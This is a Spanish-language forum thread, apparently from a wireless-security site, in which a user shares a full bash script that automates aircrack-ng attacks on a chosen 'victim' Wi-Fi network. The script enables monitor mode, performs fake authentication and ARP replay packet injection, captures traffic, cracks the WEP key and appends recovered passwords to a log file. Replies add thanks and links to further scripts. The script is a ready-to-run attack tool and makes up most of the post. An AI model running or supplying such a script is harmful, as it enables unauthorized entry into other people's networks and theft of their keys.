?>/script>'; } ?> Script Bash para automatizar Aircrack (no Airoscript) Widgets Magazine

Autor Tema: Script Bash para automatizar Aircrack (no Airoscript)  (Leído 7526 veces)

0 Usuarios y 1 Visitante están viendo este tema.

SubSeven

  • Visitante
Script Bash para automatizar Aircrack (no Airoscript)
« en: 17-01-2014, 06:12 (Viernes) »
Holas a todos

como primer post, quiero compartir conuds. un script bash que hice para automatizar el uso de aircrack-ng, es un script muy sensillo, pero quizas a alguien les ea util, he puesto tantos comentarios como me fueron posibles, basicamente es correrlo esperar que se habra una Xtrerm, escribir (en  la terminal original) el canal, enter, el BSSID, enter, un nombre, enter y cerrar la Xterm, todo lo demas sera automatico, para no tener que escribir los mismos comandos a cada rato xD

#!/bin/bash
#INTERFAZ A MODO MONITOR
MONITOR="mon0"

trap "airmon-ng stop $MONITOR" EXIT

#INTERFAZ A USAR DURANTE EL ATAQUE
if [ "$1" == "" ] ; then
INTERFAZ=$(iwconfig 2> /dev/null | grep "IEEE" | grep -o -m 1 "^[a-zA-Z0-9]\+\>")
else
INTERFAZ=$1
fi
#TODO Implementar deteccion de varias interfaces
if [ "$INTERFAZ" == "" ] ; then
   echo "No se pudo detectar la interfaz"
   echo $INTERFAZ
   exit 1
fi

#DIRECCION MAC DE LA TARJETA DE RED DEL USUARIO
HOST=$(ifconfig | grep $INTERFAZ | grep  -o "..:..:..:..:..:..")         
if [ "$HOST" == "" ] ; then
   echo "No se pudo detectar la Direccion MAC"
   echo $HOST
   exit 2
fi

#RUTA DONDE SE GUARDARA EL ARCHIVO DE INFORMACION INDIVIDUAL DE CADA RED
INFO_PATH=$(cat /etc/passwd |grep "1000" | cut -d: -f6)

#RUTA DEL ARCHIVO DONDE SE GUARDARA LA LISTA DE CLAVES OBTENIDAS
if [ -d $INFO_PATH//Documentos ] ; then
   LOG_FILE="$INFO_PATH/Documentos/WifiPasswords.txt"
else
   LOG_FILE="$INFO_PATH/WifiPasswords.txt"
fi


#RUTA DONDE SE GUARDARAN LOS ARCHIVOS CAPTURADOS
if [ ! -d $INFO_PATH/HACK ] ; then
   mkdir $INFO_PATH/HACK
   chmod 777 $INFO_PATH/HACK
fi
HOME_PATH=$INFO_PATH/HACK

#RUTA DEL ARCHIVO DE MACs Y DISPOSITIVOS
OUI_PATH="/usr/local/etc/aircrack-ng/airodump-ng-oui.txt"

#TIEMPO DE ESPERA (SEGUNDOS) PARA JUNTAR SUFICIENTES IVS ANTES DE EJECUTAR AIRCRACK
ESPERAR=120

################################################################################
# LAS VARIABLES DE ABAJO NO DEBEN MODIFICARSE, SERAN PEDIDAS EN TIEMPO EJECUCION
################################################################################
#AQUI SE GUARDA LA DIRECCION MAC (BSSID) DE LA VICTIMA
BSSID=""                    

#AQUI SE ALMACENARA EL CANAL EN EL CUAL TRABAJA LA VICTIMA
CHANNEL=""                     


#NOMBRE + PREFIJO DEL ARCHIVO DE DATOS DE LA VICTIMA
ARCHIVO=""

#NOMBRE DEL ARCHIVO DE DATOS ELEGIDO POR EL USUARIO
VICTIMA=""

#VARIABLES TEMPORALES PARA ALMACENAR EL FABRICANTE DEL DISPOSITIVO
MAC=""
CORP=""

#NOS MOVEMOS A LA CARPETA DE TRABAJO
cd $HOME_PATH

echo "#######################################################################"
echo "#                                                                     #"
echo "#       DEBE ESTAR DESCONECTADO DE INTERNET ANTES DE CONTINUAR        #"
echo "#                Y VERIFICA QUE TU MAC CORRESPONDA                    #"
echo "#                  MAC ACTUAL: $HOST                      #"
echo "#                                                                     #"

echo "#    wifi-v28                                                         #"
echo "#    Script auxiliar para automatizar una falsa autentificacion       #"
echo "#           Copyright ©, 2010-2014, SubSeven (PPFV)                   #"
echo "#                     SeguridadWireless.net                           #"
echo "#                                                                     #"
echo "# Este programa es software libre. Puede redistribuirlo y/o           #"
echo "# modificarlo bajo los términos de la Licencia Pública General        #"
echo "# de GNU según es publicada por la Free Software Foundation, bien     #"
echo "# de la versión 3 de dicha Licencia o bien (según su elección) de     #"
echo "# cualquier versión posterior.                                        #"
echo "#                                                                     #"
echo "# Este programa se distribuye con la esperanza de que sea             #"
echo "# útil, pero SIN NINGUNA GARANTÍA, incluso sin la garantía            #"
echo "# MERCANTIL implícita o sin garantizar la CONVENIENCIA PARA UN        #"
echo "# PROPÓSITO PARTICULAR. Véase la Licencia Pública General de GNU      #"
echo "# para más detalles.                                                  #"
echo "#                                                                     #"
echo "# Debería haber recibido una copia de la Licencia Pública General     #"
echo "# junto con este programa. Si no ha sido así, escriba a la            #"
echo "# Free Software Foundation, Inc.,                                     #"
echo "# en 675 Mass Ave, Cambridge, MA 02139, EEUU.                         #"
echo "#                                                                     #"
echo "#######################################################################"
#sleep 5

if ! ifconfig | grep "$MONITOR" > /dev/null ; then    # SI NO ESTA INICIADO
   airmon-ng start $INTERFAZ                     #INICIAMOS MODO MONITOR
fi &&
echo "Encuentre a su victima en la ventana siguiente," &&
echo " anote el CANAL, el BSSID, el NOMBRE  y cierre la ventana, se le pediran posteriormente..." &&
sleep 5 &&                        #ESPERAMOS UN TIEMPO PARA QUE EL USUARIO LEA LAS INSTRUCCIONES
xterm -e   airodump-ng mon0  #ABRIMOS UNA VENTANA EXTERNA ESCANEANDO LAS REDES EN LA PERIFRERIA
echo "INGRESE EL CANAL:" &&        
read CHANNEL &&                   #CERRADA LA VENTANA ANTERIOR PEDIMOS EL CANAL DE LA VICTIMA ELEGIDA
echo "CANAL ELEGIDO:" &&
echo $CHANNEL &&                  #RETROALIMENTAMOS AL USUARIO CON LA INFORMACION PROPORCIONADA
echo "AHORA INGRESE El BSSID:" &&
read BSSID &&                     #PEDIMOS EL BSSID DE LA VICTIMA
echo "BSSID ELEGIDO:" &&
echo -n $BSSID &&                    #NUEVAMENTE RETROALIMENTAMOS
if [  -f $OUI_PATH ] ; then          #SI ENCONTRAMOS AL FABRICANTE LO MOSTRAMOS
   IFS=":"
   set $BSSID
   MAC=$1-$2-$3
   IFS="   " #TAB Char
   set $(cat $OUI_PATH | grep -i $MAC)
   CORP=$2
   echo " ( $CORP )"
   unset IFS
fi
echo "ESCRIBE EL NOMBRE DE ARCHIVO DE DATOS DE LA VICTIMA SIN ESPACIOS:" &&
read VICTIMA &&                   #PEDIMOS NOMBRE DE ARCHIVO DE DATOS
ARCHIVO=$VICTIMA-$$-lvs &&
echo "EL ARCHIVO DE DATOS DE LA VICTIMA ES:" &&
echo $ARCHIVO &&                  #RETROALIMENTAMOS
echo "INICIANDO. . ." &&
echo $CHANNEL > $INFO_PATH/$VICTIMA-$$.txt     #GUARDAMOS LOS DATOS CAPTURADOS EN UN ARCHIVO
echo $BSSID >> $INFO_PATH/$VICTIMA-$$.txt
echo $VICTIMA >> $INFO_PATH/$VICTIMA-$$.txt
echo "" >> $INFO_PATH/$VICTIMA-$$.txt
if [ "$CORP" != "" ] ; then
   echo $CORP >> $INFO_PATH/$VICTIMA-$$.txt
fi

sleep 5
echo "NOS MOVEMOS AL CANAL DE LA VICTIMA . . ." &&
iwconfig $MONITOR channel $CHANNEL &&                         #NOS PASAMOS AL CANAL ELEGIDO
echo "NOS ASOCIAMOS A LA VICTIMA . . ." &&
aireplay-ng -1 0 -a $BSSID -h $HOST $MONITOR &&               #FALSA AUTENTIFICACION
echo "INYECTAMOS PAQUETES . . ." &&
xterm -e "aireplay-ng -3 -b $BSSID -h $HOST $MONITOR"  &       #INYECTAMOS EN UNA VENTANA EXTERNA
sleep 2 &&
echo "CAPTURAMOS LOS DATOS . . ." &&
xterm -e "airodump-ng -c $CHANNEL --bssid $BSSID -w $ARCHIVO $MONITOR" & #CAPTURAMOS DATOS EN OTRA VENTANA
sleep 4 &&
echo "ESPERAMOS $ESPERAR SEGUNDOS PARA EMPEZAR A SACAR LA CLAVE ;-) . . ."&&
sleep $ESPERAR &&                                                        #ESPERAMOS UN TIEMPO PARA QUE HAYAN SUFICIENTES DATOS
aircrack-ng -b $BSSID -l $ARCHIVO.key $ARCHIVO*.cap &&                         #INTENTAMOS SACAR LA CLAVE CON LOS DATOS OBTENIDOS
if [  -f $ARCHIVO.key ] ; then                              #SI OBTENEMOS LA CLAVE ACTUALIZAMOS EL ARCHIVO
   echo -n "KEY: " >> $INFO_PATH/$VICTIMA-$$.txt &&        #DE DATOS INDIVIDUAL Y LA LISTA DE CLAVES
   cat $ARCHIVO.key >> $INFO_PATH/$VICTIMA-$$.txt

   echo "================================================================" >> $LOG_FILE
   date >> $LOG_FILE
   cat $INFO_PATH/$VICTIMA-$$.txt >> $LOG_FILE
   echo "" >> $LOG_FILE
   echo "################################################################" >> $LOG_FILE
   echo "" >> $LOG_FILE
   echo "" >> $LOG_FILE
   echo "" >> $LOG_FILE
fi
airmon-ng stop $MONITOR                                       #UNA VEZ TERMINADO DESACTIVAMOS MODO MONITOR


por cierto si saben como postear un archivo adjunto  expliquenme orque no encontre como xD
decidi subirlo a mi Skydrive espero no haya inconveniente xD

http://sdrv.ms/1eG3wFb

listo, es de solo lectura

« Última modificación: 17-01-2014, 06:24 (Viernes) por SubSeven »

carrasco31

  • Visitante
Re: Script Bash para automatizar Aircrack (no Airoscript)
« Respuesta #1 en: 17-01-2014, 08:53 (Viernes) »
gracias, lo probaré


SubSeven

  • Visitante
Re: Script Bash para automatizar Aircrack (no Airoscript)
« Respuesta #2 en: 18-01-2014, 04:53 (Sábado) »
ojala te sea util xD, yo siempre lo pongo en /usr/bin, lo he corrido en Debian 6.0 y en ubuntu 12.04, en versiones mas recientes tuve problemas pero eran relacionados con los driver no con este script propiamente, me he dado cuenta en el foro que la interfaz monitor, no siempre es mon0, tendre que modificarlo para que detecte cual es la interfaz monitor real, aunque igual es solo cuestion de poner el valor manualmente jjeje, en fin

saludos a todos


SubSeven

  • Visitante
Re: Script Bash para automatizar Aircrack (no Airoscript)
« Respuesta #3 en: 06-06-2014, 04:24 (Viernes) »
agregue otros 2 scripts, wifi-nc es basicamente lo mismo solo que es para cuando no hay clientes conectados, asume que ya se uso el script anterior y por lo tanto ya se sabe que no hay conectados y ya se tiene el canal, el bssid y el essid, solo hay que poner wifi-nc <canal> <bssid> <essid> y ya, aunque puede tomar algun tiempo en salir, el otro es para saber el fabricante a partir de la MAC, asume que ya se tiene el archivo OUI descargado, aqui esta el link a mi OneDrive

http://1drv.ms/1hCGXbk

saludos a todos  ;)